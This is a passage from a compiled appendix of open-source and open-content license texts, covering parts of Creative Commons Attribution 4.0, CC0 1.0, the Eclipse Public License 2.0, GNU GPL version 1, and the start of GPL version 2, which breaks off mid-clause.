copyright notice;\niii. a notice that refers to this Public License;\niv. a notice that refers to the disclaimer of warranties;\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\nB. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and\nC. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this\nPublic License.\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in\nwhich You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or\nhyperlink to a resource that includes the required information.\n3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent\nreasonably practicable.\n4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted\nMaterial from complying with this Public License.\nSection 4 – Sui Generis Database Rights.\nWhere the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial\nportion of the contents of the database;\nb. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database\nRights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted\nMaterial; and\nc. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the\ndatabase.\nFor the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License\nwhere the Licensed Rights include other Copyright and Similar Rights.\nSection 5 – Disclaimer of Warranties and Limitation of Liability.\na. Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material\nas-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether\nexpress, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a\nparticular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors,\nwhether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may\nnot apply to You.\nb. To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation,\nnegligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses,\ncosts, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been\nadvised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in\npart, this limitation may not apply to You.\nc. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent\npossible, most closely approximates an absolute disclaimer and waiver of all liability.\nSection 6 – Term and Termination.\n20\na. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply\nwith this Public License, then Your rights under this Public License terminate automatically.\nb. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:\n1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or\n2. upon express reinstatement by the Licensor.\nc. For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your\nviolations of this Public License.\nd. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop\ndistributing the Licensed Material at any time; however, doing so will not terminate this Public License.\ne. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\nSection 7 – Other Terms and Conditions.\na. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly\nagreed.\nb. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from\nand independent of the terms and conditions of this Public License.\nSection 8 – Interpretation.\na. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose\nconditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.\nb. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed\nto the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this\nPublic License without affecting the enforceability of the remaining terms and conditions.\nc. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed\nto by the Licensor.\nd. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and\nimmunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its\npublic licenses to material it publishes and in those instances will be considered the \"Licensor.\" The text of the Creative\nCommons public licenses is dedicated to the public domain under the CC0 Public Domain Dedication. Except for the limited\npurpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the\nCreative Commons policies published at creativecommons.org/policies, Creative Commons does not authorize the use of\nthe trademark \"Creative Commons\" or any other trademark or logo of Creative Commons without its prior written consent\nincluding, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other\narrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this\nparagraph does not form part of the public licenses.\nCreative Commons may be contacted at creativecommons.org.\n21\nCC0 1.0 Universal\nCREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES.\nDISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE\nCOMMONS PROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED HEREUNDER, AND\nDISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM THE USE OF THIS DOCUMENT OR THE INFORMATION\nOR WORKS PROVIDED HEREUNDER.\nStatement of Purpose\nThe laws of most jurisdictions throughout the world automatically confer exclusive Copyright and Related Rights (defined\nbelow) upon the creator and subsequent owner(s) (each and all, an \"owner\") of an original work of authorship and/or a\ndatabase (each, a \"Work\").\nCertain owners wish to permanently relinquish those rights to a Work for the purpose of contributing to a commons of\ncreative, cultural and scientific works (\"Commons\") that the public can reliably and without fear of later claims of infringement\nbuild upon, modify, incorporate in other works, reuse and redistribute as freely as possible in any form whatsoever and for\nany purposes, including without limitation commercial purposes. These owners may contribute to the Commons to promote\nthe ideal of a free culture and the further production of creative, cultural and scientific works, or to gain reputation or greater\ndistribution for their Work in part through the use and efforts of others.\nFor these and/or other purposes and motivations, and without any expectation of additional consideration or compensation,\nthe person associating CC0 with a Work (the \"Affirmer\"), to the extent that he or she is an owner of Copyright and Related\nRights in the Work, voluntarily elects to apply CC0 to the Work and publicly distribute the Work under its terms, with\nknowledge of his or her Copyright and Related Rights in the Work and the meaning and intended legal effect of CC0 on\nthose rights.\n1. Copyright and Related Rights. A Work made available under CC0 may be protected by copyright and related or\nneighboring rights (\"Copyright and Related Rights\"). Copyright and Related Rights include, but are not limited to, the\nfollowing:\nthe right to reproduce, adapt, distribute, perform, display, communicate, and translate a Work;\nmoral rights retained by the original author(s) and/or performer(s);\npublicity and privacy rights pertaining to a person's image or likeness depicted in a Work;\nrights protecting against unfair competition in regards to a Work, subject to the limitations in paragraph 4(a), below;\nrights protecting the extraction, dissemination, use and reuse of data in a Work;\ndatabase rights (such as those arising under Directive 96/9/EC of the European Parliament and of the Council of 11 March\n1996 on the legal protection of databases, and under any national implementation thereof, including any amended or\nsuccessor version of such directive); and\nother similar, equivalent or corresponding rights throughout the world based on applicable law or treaty, and any national\nimplementations thereof.\n2. Waiver. To the greatest extent permitted by, but not in contravention of, applicable law, Affirmer hereby overtly, fully,\npermanently, irrevocably and unconditionally waives, abandons, and surrenders all of Affirmer's Copyright and Related\nRights and associated claims and causes of action, whether now known or unknown (including existing as well as future\nclaims and causes of action), in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable\nlaw or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for\nany purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"Waiver\").\nAffirmer makes the Waiver for the benefit of each member of the public at large and to the detriment of Affirmer's heirs and\nsuccessors, fully intending that such Waiver shall not be subject to revocation, rescission, cancellation, termination, or any\nother legal or equitable action to disrupt the quiet enjoyment of the Work by the public as contemplated by Affirmer's express\nStatement of Purpose.\n22\n3. Public License Fallback. Should any part of the Waiver for any reason be judged legally invalid or ineffective under\napplicable law, then the Waiver shall be preserved to the maximum extent permitted taking into account Affirmer's express\nStatement of Purpose. In addition, to the extent the Waiver is so judged Affirmer hereby grants to each affected person a\nroyalty-free, non transferable, non sublicensable, non exclusive, irrevocable and unconditional license to exercise Affirmer's\nCopyright and Related Rights in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable\nlaw or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for\nany purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"License\"). The\nLicense shall be deemed effective as of the date CC0 was applied by Affirmer to the Work. Should any part of the License\nfor any reason be judged legally invalid or ineffective under applicable law, such partial invalidity or ineffectiveness shall not\ninvalidate the remainder of the License, and in such case Affirmer hereby affirms that he or she will not (i) exercise any of his\nor her remaining Copyright and Related Rights in the Work or (ii) assert any associated claims and causes of action with\nrespect to the Work, in either case contrary to Affirmer's express Statement of Purpose.\n4. Limitations and Disclaimers.\nNo trademark or patent rights held by Affirmer are waived, abandoned, surrendered, licensed or otherwise affected by this\ndocument.\nAffirmer offers the Work as-is and makes no representations or warranties of any kind concerning the Work, express,\nimplied, statutory or otherwise, including without limitation warranties of title, merchantability, fitness for a particular purpose,\nnon infringement, or the absence of latent or other defects, accuracy, or the present or absence of errors, whether or not\ndiscoverable, all to the greatest extent permissible under applicable law.\nAffirmer disclaims responsibility for clearing rights of other persons that may apply to the Work or any use thereof, including\nwithout limitation any person's Copyright and Related Rights in the Work. Further, Affirmer disclaims responsibility for\nobtaining any necessary consents, permissions or other rights required for any use of the Work.\nAffirmer understands and acknowledges that Creative Commons is not a party to this document and has no duty or\nobligation with respect to this CC0 or use of the Work.\n23\nEclipse Public License 2.0\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC LICENSE\n(\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES RECIPIENT'S\nACCEPTANCE OF THIS AGREEMENT.\n1. DEFINITIONS\n\"Contribution\" means:\na) in the case of the initial Contributor, the initial content Distributed under this Agreement, and\nb) in the case of each subsequent Contributor:\ni) changes to the Program, and\nii) additions to the Program;\nwhere such changes and/or additions to the Program originate from and are Distributed by that particular Contributor. A\nContribution \"originates\" from a Contributor if it was added to the Program by such Contributor itself or anyone acting on\nsuch Contributor's behalf. Contributions do not include changes or additions to the Program that are not Modified Works.\n\"Contributor\" means any person or entity that Distributes the Program.\n\"Licensed Patents\" mean patent claims licensable by a Contributor which are necessarily infringed by the use or sale of its\nContribution alone or when combined with the Program.\n\"Program\" means the Contributions Distributed in accordance with this Agreement.\n\"Recipient\" means anyone who receives the Program under this Agreement or any Secondary License (as applicable),\nincluding Contributors.\n\"Derivative Works\" shall mean any work, whether in Source Code or other form, that is based on (or derived from) the\nProgram and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an\noriginal work of authorship.\n\"Modified Works\" shall mean any work in Source Code or other form that results from an addition to, deletion from, or\nmodification of the contents of the Program, including, for purposes of clarity any new file in Source Code form that contains\nany contents of the Program. Modified Works shall not include works that contain only declarations, interfaces, types,\nclasses, structures, or files of the Program solely in each case in order to link to, bind by name, or subclass the Program or\nModified Works thereof.\n\"Distribute\" means the acts of a) distributing or b) making available in any manner that enables the transfer of a copy.\n\"Source Code\" means the form of a Program preferred for making modifications, including but not limited to software source\ncode, documentation source, and configuration files.\n\"Secondary License\" means either the GNU General Public License, Version 2.0, or any later versions of that license,\nincluding any exceptions or additional permissions as identified by the initial Contributor.\n2. GRANT OF RIGHTS\na) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free\ncopyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, Distribute and sublicense the\nContribution of such Contributor, if any, and such Derivative Works.\nb) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free\npatent license under Licensed Patents to make, use, sell, offer to sell, import and otherwise transfer the Contribution of such\nContributor, if any, in Source Code or other form. This patent license shall apply to the combination of the Contribution and\nthe Program if, at the time the Contribution is added by the Contributor, such addition of the Contribution causes such\ncombination to be covered by the Licensed Patents. The patent license shall not apply to any other combinations which\ninclude the Contribution. No hardware per se is licensed hereunder.\n24\nc) Recipient understands that although each Contributor grants the licenses to its Contributions set forth herein, no\nassurances are provided by any Contributor that the Program does not infringe the patent or other intellectual property rights\nof any other entity. Each Contributor disclaims any liability to Recipient for claims brought by any other entity based on\ninfringement of intellectual property rights or otherwise. As a condition to exercising the rights and licenses granted\nhereunder, each Recipient hereby assumes sole responsibility to secure any other intellectual property rights needed, if any.\nFor example, if a third party patent license is required to allow Recipient to Distribute the Program, it is Recipient's\nresponsibility to acquire that license before distributing the Program.\nd) Each Contributor represents that to its knowledge it has sufficient copyright rights in its Contribution, if any, to grant the\ncopyright license set forth in this Agreement.\ne) Notwithstanding the terms of any Secondary License, no Contributor makes additional grants to any Recipient (other than\nthose set forth in this Agreement) as a result of such Recipient's receipt of the Program under the terms of a Secondary\nLicense (if permitted under the terms of Section 3).\n3. REQUIREMENTS\n3.1 If a Contributor Distributes the Program in any form, then:\na) the Program must also be made available as Source Code, in accordance with section 3.2, and the Contributor must\naccompany the Program with a statement that the Source Code for the Program is available under this Agreement, and\ninforms Recipients how to obtain it in a reasonable manner on or through a medium customarily used for software exchange;\nand\nb) the Contributor may Distribute the Program under a license different than this Agreement, provided that such license:\ni) effectively disclaims on behalf of all other Contributors all warranties and conditions, express and implied, including\nwarranties or conditions of title and non-infringement, and implied warranties or conditions of merchantability and fitness for\na particular purpose;\nii) effectively excludes on behalf of all other Contributors all liability for damages, including direct, indirect, special, incidental\nand consequential damages, such as lost profits;\niii) does not attempt to limit or alter the recipients' rights in the Source Code under section 3.2; and\niv) requires any subsequent distribution of the Program by any party to be under a license that satisfies the requirements of\nthis section 3.\n3.2 When the Program is Distributed as Source Code:\na) it must be made available under this Agreement, or if the Program (i) is combined with other material in a separate file or\nfiles made available under a Secondary License, and (ii) the initial Contributor attached to the Source Code the notice\ndescribed in Exhibit A of this Agreement, then the Program may be made available under the terms of such Secondary\nLicenses, and\nb) a copy of this Agreement must be included with each copy of the Program.\n3.3 Contributors may not remove or alter any copyright, patent, trademark, attribution notices, disclaimers of warranty, or\nlimitations of liability (\"notices\") contained within the Program from any copy of the Program which they Distribute, provided\nthat Contributors may add their own appropriate notices.\n4. COMMERCIAL DISTRIBUTION\nCommercial distributors of software may accept certain responsibilities with respect to end users, business partners and the\nlike. While this license is intended to facilitate the commercial use of the Program, the Contributor who includes the Program\nin a commercial product offering should do so in a manner which does not create potential liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering, such Contributor (\"Commercial\nContributor\") hereby agrees to defend and indemnify every other Contributor (\"Indemnified Contributor\") against any losses,\ndamages and costs (collectively \"Losses\") arising from claims, lawsuits and other legal actions brought by a third party\nagainst the Indemnified Contributor to the extent caused by the acts or omissions of such Commercial Contributor in\nconnection with its distribution of the Program in a commercial product offering. The obligations in this section do not apply\nto any claims or Losses relating to any actual or alleged intellectual property infringement. In order to qualify, an Indemnified\nContributor must: a) promptly notify the Commercial Contributor in writing of such claim, and b) allow the Commercial\nContributor to control, and cooperate with the Commercial Contributor in, the defense and any related settlement\nnegotiations. The Indemnified Contributor may participate in any such claim at its own expense.\nFor example, a Contributor might include the Program in a commercial product offering, Product X. That Contributor is then a\nCommercial Contributor. If that Commercial Contributor then makes performance claims, or offers warranties related to\nProduct X, those performance claims and warranties are such Commercial Contributor's responsibility alone. Under this\nsection, the Commercial Contributor would have to defend claims against the other Contributors related to those\nperformance claims and warranties, and if a court requires any other Contributor to pay any damages as a result, the\nCommercial Contributor must pay those damages.\n25\n5. NO WARRANTY\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT PERMITTED BY APPLICABLE\nLAW, THE PROGRAM IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,\nEITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE,\nNON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is solely\nresponsible for determining the appropriateness of using and distributing the Program and assumes all risks associated with\nits exercise of rights under this Agreement, including but not limited to the risks and costs of program errors, compliance with\napplicable laws, damage to or loss of data, programs or equipment, and unavailability or interruption of operations.\n6. DISCLAIMER OF LIABILITY\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT PERMITTED BY APPLICABLE\nLAW, NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST\nPROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION\nOF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n7. GENERAL\nIf any provision of this Agreement is invalid or unenforceable under applicable law, it shall not affect the validity or\nenforceability of the remainder of the terms of this Agreement, and without further action by the parties hereto, such\nprovision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.\nIf Recipient institutes patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the\nProgram itself (excluding combinations of the Program with other software or hardware) infringes such Recipient's patent(s),\nthen such Recipient's rights granted under Section 2(b) shall terminate as of the date such litigation is filed.\nAll Recipient's rights under this Agreement shall terminate if it fails to comply with any of the material terms or conditions of\nthis Agreement and does not cure such failure in a reasonable period of time after becoming aware of such noncompliance.\nIf all Recipient's rights under this Agreement terminate, Recipient agrees to cease use and distribution of the Program as\nsoon as reasonably practicable. However, Recipient's obligations under this Agreement and any licenses granted by\nRecipient relating to the Program shall continue and survive.\nEveryone is permitted to copy and distribute copies of this Agreement, but in order to avoid inconsistency the Agreement is\ncopyrighted and may only be modified in the following manner. The Agreement Steward reserves the right to publish new\nversions (including revisions) of this Agreement from time to time. No one other than the Agreement Steward has the right to\nmodify this Agreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse Foundation may assign the\nresponsibility to serve as the Agreement Steward to a suitable separate entity. Each new version of the Agreement will be\ngiven a distinguishing version number. The Program (including Contributions) may always be Distributed subject to the\nversion of the Agreement under which it was received. In addition, after a new version of the Agreement is published,\nContributor may elect to Distribute the Program (including its Contributions) under the new version.\nExcept as expressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights or licenses to the intellectual\nproperty of any Contributor under this Agreement, whether expressly, by implication, estoppel or otherwise. All rights in the\nProgram not expressly granted under this Agreement are reserved. Nothing in this Agreement is intended to be enforceable\nby any entity that is not a Contributor or Recipient. No third-party beneficiary rights are created under this Agreement.\nExhibit A - Form of Secondary Licenses Notice\n\"This Source Code may also be made available under the following Secondary Licenses when the conditions for such\navailability set forth in the Eclipse Public License, v. 2.0 are satisfied: {name license(s), version(s), and exceptions or\nadditional permissions here}.\"\nSimply including a copy of this Agreement, including this Exhibit A is not sufficient to license the Source Code under\nSecondary Licenses.\n26\nIf it is not possible or desirable to put the notice in a particular file, then You may include the notice in a location (such as a\nLICENSE file in a relevant directory) where a recipient would be likely to look for such a notice.\nYou may add additional accurate notices of copyright ownership.\n27\nGNU General Public License Version 1\nFebruary 1989\nCopyright (C) 1989 Free Software Foundation, Inc. 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\nPreamble\nThe license agreements of most software companies try to keep users at the mercy of those companies. By contrast, our\nGeneral Public License is intended to guarantee your freedom to share and change free software--to make sure the software\nis free for all its users. The General Public License applies to the Free Software Foundation's software and to any other\nprogram whose authors commit to using it. You can use it for your programs, too.\nWhen we speak of free software, we are referring to freedom, not price. Specifically, the General Public License is designed\nto make sure that you have the freedom to give away or sell copies of free software, that you receive source code or can get\nit if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do\nthese things.\nTo protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender\nthe rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you\nmodify it.\nFor example, if you distribute copies of a such a program, whether gratis or for a fee, you must give the recipients all the\nrights that you have. You must make sure that they, too, receive or can get the source code. And you must tell them their\nrights.\nWe protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal\npermission to copy, distribute and/or modify the software.\nAlso, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for\nthis free software. If the software is modified by someone else and passed on, we want its recipients to know that what they\nhave is not the original, so that any problems introduced by others will not reflect on the original authors' reputations.\nThe precise terms and conditions for copying, distribution and modification follow.\nGNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n0. This License Agreement applies to any program or other work which contains a notice placed by the copyright holder\nsaying it may be distributed under the terms of this General Public License. The \"Program\", below, refers to any such\nprogram or work, and a \"work based on the Program\" means either the Program or any work containing the Program or a\nportion of it, either verbatim or with modifications. Each licensee is addressed as \"you\".\n1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided\nthat you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this General Public License and to the absence of any warranty; and give any other\nrecipients of the Program a copy of this General Public License along with the Program. You may charge a fee for the\nphysical act of transferring a copy.\n2. You may modify your copy or copies of the Program or any portion of it, and copy and distribute such modifications under\nthe terms of Paragraph 1 above, provided that you also do the following:\na) cause the modified files to carry prominent notices stating that you changed the files and the date of any change; and\nb) cause the whole of any work that you distribute or publish, that in whole or in part contains the Program or any part\nthereof, either with or without modifications, to be licensed at no charge to all third parties under the terms of this General\nPublic License (except that you may choose to grant warranty protection to some or all third parties, at your option).\nc) If the modified program normally reads commands interactively when run, you must cause it, when started running for\n28\nsuch interactive use in the simplest and most usual way, to print or display an announcement including an appropriate\ncopyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may\nredistribute the program under these conditions, and telling the user how to view a copy of this General Public License.\nd) You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in\nexchange for a fee.\nMere aggregation of another independent work with the Program (or its derivative) on a volume of a storage or distribution\nmedium does not bring the other work under the scope of these terms.\n3. You may copy and distribute the Program (or a portion or derivative of it, under Paragraph 2) in object code or executable\nform under the terms of Paragraphs 1 and 2 above provided that you also do one of the following:\na) accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms\nof Paragraphs 1 and 2 above; or,\nb) accompany it with a written offer, valid for at least three years, to give any third party free (except for a nominal charge for\nthe cost of distribution) a complete machine-readable copy of the corresponding source code, to be distributed under the\nterms of Paragraphs 1 and 2 above; or,\nc) accompany it with the information you received as to where the corresponding source code may be obtained. (This\nalternative is allowed only for noncommercial distribution and only if you received the program in object code or executable\nform alone.)\nSource code for a work means the preferred form of the work for making modifications to it. For an executable file, complete\nsource code means all the source code for all modules it contains; but, as a special exception, it need not include source\ncode for modules which are standard libraries that accompany the operating system on which the executable file runs, or for\nstandard header files or definitions files that accompany that operating system.\n4. You may not copy, modify, sublicense, distribute or transfer the Program except as expressly provided under this General\nPublic License. Any attempt otherwise to copy, modify, sublicense, distribute or transfer the Program is void, and will\nautomatically terminate your rights to use the Program under this License. However, parties who have received copies, or\nrights to use copies, from you under this General Public License will not have their licenses terminated so long as such\nparties remain in full compliance.\n5. By copying, distributing or modifying the Program (or any work based on the Program) you indicate your acceptance of\nthis license to do so, and all its terms and conditions.\n6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license\nfrom the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not\nimpose any further restrictions on the recipients' exercise of the rights granted herein.\n7. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time.\nSuch new versions will be similar in spirit to the present version, but may differ in detail to address new problems or\nconcerns.\nEach version is given a distinguishing version number. If the Program specifies a version number of the license which\napplies to it and \"any later version\", you have the option of following the terms and conditions either of that version or of any\nlater version published by the Free Software Foundation. If the Program does not specify a version number of the license,\nyou may choose any version ever published by the Free Software Foundation.\n8. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to\nthe author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free\nSoftware Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the\nfree status of all derivatives of our free software and of promoting the sharing and reuse of software generally.\nNO WARRANTY\n9.\nBECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO\nTHE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE\nCOPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY\nKIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n10. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT\n29\nHOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED\nABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT\nNOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR\nTHIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n30\nGNU General Public License Version 2\nJune 1991\nCopyright (C) 1989, 1991 Free Software Foundation, Inc.\n51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\nEveryone is permitted to copy and distribute verbatim copies\nof this license document, but changing it is not allowed.\nPreamble\nThe licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU\nGeneral Public License is intended to guarantee your freedom to share and change free software--to make sure the software\nis free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any\nother program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU\nLibrary General Public License instead.) You can apply it to your programs, too.\nWhen we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make\nsure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive\nsource code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that\nyou know you can do these things.\nTo protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender\nthe rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you\nmodify it.\nFor example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights\nthat you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms\nso they know their rights.\nWe protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal\npermission to copy, distribute and/or modify the software.\nAlso, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for\nthis free software. If the software is modified by someone else and passed on, we want its recipients to know that what they\nhave is not the original, so that any problems introduced by others will not reflect on the original authors' reputations.\nFinally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a\nfree program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made\nit clear that any patent must be licensed for everyone's free use or not licensed at all.\nThe precise terms and conditions for copying, distribution and modification follow.\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be\ndistributed under the terms of this General Public License. The \"Program\", below, refers to any such program or work, and a\n\"work based on the Program\" means either the Program or any derivative work under copyright law: that is to say, a work\ncontaining the Program or a portion of it, either verbatim or with modifications and/or translated into another language.\n(Hereinafter, translation is included without limitation in the term \"modification\".) Each licensee is addressed as \"you\".\nActivities other than copying, distribution and modification are not covered by this License; they are outside its scope. The\nact of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work\nbased on the Program (independent of having been made by running the Program). Whether that is true depends on what\n31\nthe Program does.\n1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided\nthat you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the\nProgram a copy of this License along with the Program.\nYou may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in\nexchange for a fee.\n2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and\ncopy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these\nconditions:\na) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any\nchange.\nb) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or\nany part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License.\nc) If the modified program normally reads commands interactively when run, you must cause it, when started running for\nsuch interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice\nand a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute 